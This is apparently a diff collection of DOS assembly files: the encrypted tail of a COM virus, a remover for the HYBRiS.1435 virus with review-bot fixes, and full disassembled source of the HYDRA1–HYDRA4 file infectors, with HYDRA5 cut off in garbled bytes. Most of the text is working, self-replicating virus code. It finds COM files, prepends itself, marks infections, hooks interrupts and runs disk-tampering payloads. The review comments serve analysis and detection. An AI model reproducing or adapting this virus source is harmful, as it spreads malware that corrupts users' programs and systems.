push word ptr ds:[2]
pop word ptr cs:[OldCritical+2]
pop word ptr cs:[OldCritical]
mov word ptr ds:[0],offset CriticalError
push cs
pop word ptr ds:[02]
pop ds
pop ax
ret
ResetCritical:
push ax
push ds
push word ptr cs:[OldCritical]
mov ax,9
push word ptr cs:[OldCritical+2]
mov ds,ax
pop word ptr ds:[2]
pop word ptr ds:[0]
pop ds
pop ax
ret
CriticalError: ;new int24h handler
mov al,3 ;returns no error
iret
OldCritical dd 0 ;dw 0,0
ran_num dw ?
decrypt:
encrypt:
mov ax,word ptr ds:[bp+enc_val] ;enc value in ax
lea di,[bp+install] ;pointer to encryption start
mov cx,(encrypt-install)/2 ;number of words to be encrypted
xor_loopy:
xor word ptr ds:[di],ax
inc di
inc di
loop xor_loopy
ret
enc_val dw 0
entry_point:
call get_bp ;to get the delta offset
;classic old trick..
get_bp:
pop bp
sub bp, offset get_bp
call decrypt ;decrypt virus
jmp install ;jmp to install code
newjmp db 0e9h,00h,00h,'@' ;buffer to calculate a new entry
orgjmp db 0cdh,20h,00,00 ;buffer to save the 4 first bytes
virus_end:
end virus_start
================================================================================
@@ -0,0 +1,341 @@
.model tiny
.code
org 100h
start:
jmp short begin_code
copyright db "HYBRiS.1435 Remover. (c) 1995 The Unforgiven/Immortal Riot",0
begin_code:
push dx ; Cool self-check..
push ds
mov ah,9
mov dx,offset intro_msg
int 21h
pop bx
pop dx
cmp bx,dx
jne wrong
mov ah,9
mov dx,offset ok_msg
int 21h
jmp short start_msg1
wrong:
mov ah,9
mov dx,offset wrong_msg
int 21h
int 20h
intro_msg db 'Selfcheck $'
ok_msg db 'OK',13,10,'$'
wrong_msg db 'Failed',13,10,'$'
start_msg1:
mov ah,9 ;print starting msg...
mov dx, offset begin
int 21h
mov ah,0 ;did they agree on the rules?
int 16h
cmp ah,15h ;y/Y
je ok_phile ;yes, they did
mov ah,9 ;print blah..
mov dx, offset not_yes
int 21h
int 20h
not_yes db "User Failure!",13,10,07,36
ok_phile:
mov ah,4ah ;Do a virus installation check. . .
mov bx,0ffffh
mov cx,0d00dh
int 21h
cmp ax,cx ;ax=cx=d00d= the virus is TSR. . .
jne not_res
mov ah,9
mov dx, offset resident
int 21h
int 20h
not_res:
mov ah,2fh ;Get DTA-area to es:bx
int 21h
mov ah,4eh ;find first file matching ds:dx (com)
;with any attribute
next:
mov cx,7
mov dx, offset f_com
int 21h
jc no_com ;we have no more com-files
call main ;got a com-file - search it
mov ah,4fh ;get next com-file
jmp short next
no_com:
terminate: ;no more files!
mov ah,9
mov dx, offset stat1
int 21h
; This nice statistics is made by Blonde. Greetings to him.
mov dx, word ptr [count]
call dec16out
mov ah,9
mov dx, offset stat2
int 21h
mov dx, word ptr [inf]
call dec16out
mov ax,4cffh
int 21h
main:
inc byte ptr [count]
push ax
push bx
push cx
push dx
push di
push si
push es
push es
pop ds
push cs
pop es
mov si,bx
add si,1Eh ;bx = pointer to fname (1eh)
mov di,offset fname_buf
mov cx,0Fh ;cx=15
push cx ;save cx = 15
push di ;save di (fname)
rep movsb ;rep until cx=0
pop di ;restore di
pop cx ;and set cx=15
xor al,al ;zero out al
cld ;Clear direction
repne scasb ;Scan es:[di] for al
push di ;save di
mov al,20h ;
rep stosb ;Store al (fname) to es:[di]
mov byte ptr es:[di],36 ;'$'
pop di
pop es
push cs
pop ds
;mov ah,9 ;print fname
;mov dx,offset fname_buf
;int 21h
mov cx,15 ;with BIOS function due to this procedure
mov si, offset fname_buf ;can be used quite frequently. This is
lup: lodsb ;faster
int 29h ;mov ah,0ch, int 10h
loop lup
mov ax,3d02h ;prepare open in read/write access
mov dx,bx ;bx into dx
add dx,1eh ;bx = pointer to fname
push es ;make es=ds
pop ds
int 21h ;do it!
jnc read_file
mov ah,9 ;uerm? we couldnt open the file
mov dx, offset error_open ;fucking write-protected.. or lame coding
int 21h ;not zoinking f_attribs??
jmp no_inf
read_file:
mov bx,ax ;place file handle in bx
mov ah,3fh ;read first 4 bytes of the file
mov cx,4 ;to a buffer in memory
mov dx, offset read_buf
int 21h
cmp byte ptr ds:[read_buf+3],'@' ;4th byte = @?
jne No_inf
cmp byte ptr ds:[read_buf],0e9h ;1st byte = jmp?
jne no_inf
inc byte ptr [inf]
mov ah,9 ;say that the file is infected
mov dx, offset is_inf
int 21h
mov ah,0 ;wait keypress
int 16h
cmp ah,15h ;y/Y ?
je remove ; => they want to remove it..
jmp no_inf
remove:
mov ax,4202h
mov cx,-1
mov dx,-4
int 21h
mov ah,3fh ;read those bytes to a buffer
mov cx,4
mov dx,offset read_buf
int 21h
mov ax,4200h ;seek the beginning of file
xor cx,cx
xor dx,dx
int 21h
mov ah,40h ;write the original bytes to
mov dx,offset read_buf ;the top of file
mov cx,4
int 21h
mov ax,4202h ;seek (filesize-vir_size)
mov cx,-1
mov dx,-1435
int 21h
mov ah,40h ;truncate vir_size..
xor cx,cx
int 21h
mov ah,9 ;Report that the file is clean. . .
mov dx, offset _clean
int 21h
mov byte ptr [clean_f],1
no_inf:
cmp byte ptr [clean_f],1
je skip
mov ah,9 ;say that the file is infected
mov dx, offset is_cle
int 21h
skip:
mov ah,9 ;print linefeed instead of
mov dx, offset linefeed ;mov byte ptr es:[di-1],13
int 21h ;mov byte ptr es:[di],10
;mov byte ptr es:[di+1],36 (see above)
;this is simpler for reporting. . .
mov ah,3eh ;close file
int 21h
pop si ;restore registers in use
pop si
pop dx
pop cx
pop bx
pop ax
ret ;and return to caller
dec16out:
push ds ;This convertation is
push di ;Blonde(tm)
push dx
push cx
push ax
xor cx,cx ;initialize the counter
lea di, buf ;point to a buffer
dec16out1:
push cx ;save the count
mov ax,dx ;AX is the numerator
xor dx,dx ;clear upper half
mov cx,10 ;divisor of 10
div cx ;divide
xchg ax,dx ;get quotient
add al,30h ;increase to ASCII
mov [di],al ;put in byte in ascii-format
inc di ;point to next byte
pop cx ;restore count
inc cx ;count the digit
or dx,dx ;done? (dx=0?)
jnz dec16out1 ;if not zero, loop until dx = 0
dec16out2:
dec di ;decreasment of di
mov dl,[di]
mov ah,2
int 21h ;write dl to screen output
loop dec16out2
pop ax ;restore registers
pop cx
pop dx
pop di
pop ds
ret ;and return
begin:
db "Remover for the HYBRIS virus: This program is free of charge for all users.",13,10
db 'DISCLAIMER: This software is provided "AS IS" without warranty of any kind,',13,10
db "either expressed or implied, including but not limited to the fitness for",13,10
db "any particular purpose. The entire risc as to its quality of performance",13,10
db "is assumed by the user. Agree with those rules [Y/N]",13,10,36
f_com db "*.COM",0 ;COM-spec
buf dw ?
read_buf db ?,?,?,? ;4 buffers to read into
is_inf db "Is infected! Remove it? [Y/N]$ "
_clean db " File is now clean....$"
is_cle db "is clean...$"
error_open db " Error open file$ ";shouldnt happen. . .
resident db "Virus is already resident, aborting$"
fname_buf db 65 dup (?) ;fname = max 64, but ah well!
linefeed db 0ah,0dh,'$' ;linefeed+ end of print marker.
count dw 0
inf dw 0
clean_f db ?
host_clean db "Self-checking OK!",13,10,36
host_infected db "Program is infected and will not run$",13,10
stat1 db 13,10
db "Number of files scanned: $"
stat2 db 13,10
db "Number of files cleaned: $"
end start
================================================================================
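Review bot: `read_file` treats any file whose first byte is 0E9h and fourth byte is '@' as infected, and `remove` then rewrites the header and truncates 1435 bytes without checking the file length or the result of any `int 21h` call, so a clean COM file that happens to match, or a failed seek or read, ends with a damaged file. The read count is not checked either, so a file shorter than four bytes is judged on whatever the previous file left in `read_buf`. I would at least confirm after the first seek in `remove` that the call succeeded and that the file is long enough, as sketched below, and add `jc` checks after the remaining calls. Separately, the open-failure path jumps to `no_inf`, which prints "is clean..." and then closes with BX still holding the DTA offset rather than a file handle; it should jump to a label placed after the close instead.

```asm
remove:
        ; … unchanged: seek to EOF-4 (ax=4202h, cx:dx=-4) …
        int     21h
        jc      remove_bail             ;seek failed - leave the file untouched
        or      dx,dx                   ;dx:ax = file size - 4
        jnz     remove_bail             ;larger than 64K, cannot be a COM host
        cmp     ax,1435                 ;need 4 header bytes + 1435 appended bytes
        jae     remove_read
remove_bail:
        jmp     skip                    ;report nothing, just close the file
remove_read:
        ; … unchanged: read saved bytes, rewrite header, truncate …
```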
@@ -0,0 +1,196 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA1 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 27-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
psp_cmd_size equ 80h
data_12e equ 100h
data_13e equ 193h
data_14e equ 196h
data_15e equ 271h
data_16e equ 293h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra1 proc far
start:
jmp loc_1
pop cx
inc sp
add [bx+si],al
data_3 db 'HyDra-1 Beta - Not For Release'
db '. *.CO?'
db 0
data_6 dw 0, 8B39h
data_8 dw 0
data_9 db 0
db 29 dup (0)
data_10 db 0
db 13 dup (0)
data_11 db 'HYDRA$'
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. $'
loc_1:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,193h
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_9
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_3+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_2:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_10
mov al,2
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_13e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,193h
mov cs:data_8,ax
cmp word ptr ds:data_14e,4459h
jne loc_3 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_6 ; Jump if carry Set
jmp short loc_2
loc_3:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_4 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_8
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_4:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_5:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_7
nop
loc_6:
push dx
xor ax,ax ; Zero register
mov ax,0F00h
int 10h ; Video display ah=functn 0Fh
; get state, al=mode, bh=page
; ah=columns on screen
mov ah,0
int 10h ; Video display ah=functn 00h
; set display mode in al
mov ax,200h
mov dh,6
mov dl,25h ; '%'
int 10h ; Video display ah=functn 02h
; set cursor location in dx
xor dx,dx ; Zero register
mov dx,offset data_11 ; ('HYDRA')
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
mov ax,200h
mov dh,17h
mov dl,0
int 10h ; Video display ah=functn 02h
; set cursor location in dx
mov dx,offset copyright ; ('Copyright (c)')
mov ah,9
int 21h ; DOS Services ah=function 09h
; display char string at ds:dx
mov ax,200h
mov dh,18h
mov dl,0
int 10h ; Video display ah=functn 02h
; set cursor location in dx
mov ax,3504h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov ax,es
mov dx,bx
mov ds,ax
mov ax,2509h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
mov ax,0
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
loc_7:
xor di,di ; Zero register
mov si,data_15e
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_6,0
mov word ptr cs:data_6+2,es
pop bx
jmp dword ptr cs:data_6
push ds
pop es
mov cx,0FFFFh
mov si,data_16e
mov di,data_12e
sub cx,si
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
mov ax,bx
jmp dword ptr cs:[100h]
int 20h ; DOS program terminate
hydra1 endp
seg_a ends
end start
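Review bot: The `pop cx` / `inc sp` / `add [bx+si],al` lines after `jmp loc_1` are not code: they are the bytes 59h 44h 00h 00h ('YD' plus two zero bytes) that the disassembler decoded as instructions. `cmp word ptr ds:data_14e,4459h` tests exactly those two bytes, at offset 3 of each file read into the buffer at `data_13e`, as the already-infected marker. The listing would read correctly with them declared as data, `db 'YD',0,0 ; infection marker at file offset 3`, which also gives an analyst a fixed string to match alongside the 'HyDra-1 Beta' text. The same applies to the HYDRA2, HYDRA3 and HYDRA4 listings that follow, and to the start of HYDRA5.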
@@ -0,0 +1,164 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA2 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 27-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_1e equ 100h
data_2e equ 235h
data_3e equ 257h
data_4e equ 522h
psp_cmd_size equ 80h
data_15e equ 157h
data_16e equ 15Ah
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra2 proc far
start:
jmp loc_1
pop cx
inc sp
add [bx+si],al
data_7 db 'HyDra-2 Beta - Not For Release'
db '. *.CO?'
db 0
data_10 dw 0, 8B39h
data_12 dw 0
data_13 db 0
db 29 dup (0)
data_14 db 0
db 13 dup (0)
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. '
loc_1:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,157h
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_13
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_7+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_2:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_14
mov al,2
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_15e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,157h
mov cs:data_12,ax
cmp word ptr ds:data_16e,4459h
jne loc_3 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_6 ; Jump if carry Set
jmp short loc_2
loc_3:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_4 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_12
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_4:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_5:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_7
nop
loc_6:
push dx
xor ax,ax ; Zero register
xor ax,ax ; Zero register
mov ds,ax
mov bx,data_4e
mov ah,0FFh
mov [bx],ah
xor ax,ax ; Zero register
int 13h ; Disk dl=drive 0 ah=func 00h
; reset disk, al=return status
mov ax,0
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
loc_7:
xor di,di ; Zero register
mov si,data_2e
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_10,0
mov word ptr cs:data_10+2,es
pop bx
jmp dword ptr cs:data_10
push ds
pop es
mov cx,0FFFFh
mov si,data_3e
mov di,data_1e
sub cx,si
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
mov ax,bx
jmp dword ptr cs:[100h]
int 20h ; DOS program terminate
hydra2 endp
seg_a ends
end start
@@ -0,0 +1,163 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA3 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 27-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
psp_cmd_size equ 80h
data_11e equ 100h
data_12e equ 156h
data_13e equ 159h
data_14e equ 234h
data_15e equ 256h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra3 proc far
start:
jmp loc_1
pop cx
inc sp
add [bx+si],al
data_3 db 'HyDra-3 Beta - Not For Release'
db '. *.CO?'
db 0
data_6 dw 0, 8B39h
data_8 dw 0
data_9 db 0
db 29 dup (0)
data_10 db 0
db 13 dup (0)
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. '
loc_1:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,156h
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_9
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_3+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_2:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_10
mov al,2
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_12e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,156h
mov cs:data_8,ax
cmp word ptr ds:data_13e,4459h
jne loc_3 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_6 ; Jump if carry Set
jmp short loc_2
loc_3:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_4 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_8
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_4:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_5:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_7
nop
loc_6:
push dx
mov ax,3504h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov ax,es
mov dx,bx
mov ds,ax
mov ax,2513h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
mov ax,0
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
loc_7:
xor di,di ; Zero register
mov si,data_14e
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_6,0
mov word ptr cs:data_6+2,es
pop bx
jmp dword ptr cs:data_6
push ds
pop es
mov cx,0FFFFh
mov si,data_15e
mov di,data_11e
sub cx,si
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
mov ax,bx
jmp dword ptr cs:[100h]
int 20h ; DOS program terminate
hydra3 endp
seg_a ends
end start
@@ -0,0 +1,163 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA4 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 28-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
psp_cmd_size equ 80h
data_11e equ 100h
data_12e equ 154h
data_13e equ 157h
data_14e equ 232h
data_15e equ 254h
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra4 proc far
start:
jmp loc_1
pop cx
inc sp
add [bx+si],al
data_3 db 'HyDra-4 Beta - Not For Release'
db '. *.CO?'
db 0
data_6 dw 0, 8B39h
data_8 dw 0
data_9 db 0
db 29 dup (0)
data_10 db 0
db 13 dup (0)
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. '
loc_1:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,154h
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_9
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_3+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_2:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_10
mov al,2
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_12e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,154h
mov cs:data_8,ax
cmp word ptr ds:data_13e,4459h
jne loc_3 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
jc loc_6 ; Jump if carry Set
jmp short loc_2
loc_3:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_4 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_8
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_4:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_5:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_7
nop
loc_6:
push dx
mov ax,3540h
int 21h ; DOS Services ah=function 35h
; get intrpt vector al in es:bx
mov dx,bx
push es
pop ds
mov ax,2513h
int 21h ; DOS Services ah=function 25h
; set intrpt vector al to ds:dx
mov ax,0
int 21h ; DOS Services ah=function 00h
; terminate, cs=progm seg prefx
loc_7:
xor di,di ; Zero register
mov si,data_14e
mov cx,22h
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
pop bx
mov cs:data_6,0
mov word ptr cs:data_6+2,es
pop bx
jmp dword ptr cs:data_6
push ds
pop es
mov cx,0FFFFh
mov si,data_15e
mov di,data_11e
sub cx,si
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov word ptr cs:[100h],100h
mov word ptr cs:[102h],ds
mov ax,bx
jmp dword ptr cs:[100h]
int 20h ; DOS program terminate
hydra4 endp
seg_a ends
end start
@@ -0,0 +1,189 @@
PAGE 59,132
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
;ÛÛ ÛÛ
;ÛÛ HYDRA5 ÛÛ
;ÛÛ ÛÛ
;ÛÛ Created: 21-Aug-91 ÛÛ
;ÛÛ Passes: 5 Analysis Options on: AW ÛÛ
;ÛÛ Copyright (c) ÛÛ
;ÛÛ ÛÛ
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
data_1e equ 23Eh
psp_cmd_size equ 80h
data_17e equ 187h
data_18e equ 18Ah
seg_a segment byte public
assume cs:seg_a, ds:seg_a
org 100h
hydra5 proc far
start:
jmp loc_1
pop cx
inc sp
add [bx+si],al
data_4 db 'HyDra-5 Beta - Not For Release'
db '. *.CO?'
db 0
data_7 dw 0, 8B39h
data_9 dw 0
data_10 db 0
db 29 dup (0)
data_11 db 0
db 13 dup (0)
copyright db 'Copyright (c)'
db ' 1991 by C.A.V.E. '
loc_1:
push ax
mov ax,cs
add ax,1000h
xor di,di ; Zero register
mov cx,187h
mov si,100h
mov es,ax
rep movsb ; Rep when cx >0 Mov [si] to es:[di]
mov ah,1Ah
mov dx,offset data_10
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
mov ah,4Eh ; 'N'
mov dx,offset data_4+22h ; ('*')
int 21h ; DOS Services ah=function 4Eh
; find 1st filenam match @ds:dx
jc loc_5 ; Jump if carry Set
loc_2:
mov ah,3Dh ; '='
mov al,2
mov dx,offset data_11
mov al,2
int 21h ; DOS Services ah=function 3Dh
; open file, al=mode,name@ds:dx
mov bx,ax
push es
pop ds
mov ax,3F00h
mov cx,0FFFFh
mov dx,data_17e
int 21h ; DOS Services ah=function 3Fh
; read file, bx=file handle
; cx=bytes to ds:dx buffer
add ax,187h
mov cs:data_9,ax
cmp word ptr ds:data_18e,4459h
jne loc_3 ; Jump if not equal
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
mov ah,4Fh ; 'O'
int 21h ; DOS Services ah=function 4Fh
; find next filename match
;* jc loc_6 ; Jump if carry Set
db 72h, 54h
jmp short loc_2
loc_3:
xor cx,cx ; Zero register
mov dx,cx
mov ax,4200h
int 21h ; DOS Services ah=function 42h
; move file ptr, bx=file handle
; al=method, cx,dx=offset
jc loc_4 ; Jump if carry Set
mov ah,40h ; '@'
xor dx,dx ; Zero register
mov cx,cs:data_9
int 21h ; DOS Services ah=function 40h
; write file bx=file handle
; cx=bytes from ds:dx buffer
loc_4:
mov ah,3Eh ; '>'
int 21h ; DOS Services ah=function 3Eh
; close file, bx=file handle
push cs
pop ds
loc_5:
mov ah,1Ah
mov dx,psp_cmd_size
int 21h ; DOS Services ah=function 1Ah
; set DTA(disk xfer area) ds:dx
jmp short loc_7
nop
inc word ptr [bx+si]
add [bx+si],al
add [bx+si],al
pop ds
add [bx],bh
aas ; Ascii adjust
aas ; Ascii adjust
aas ; Ascii adjust
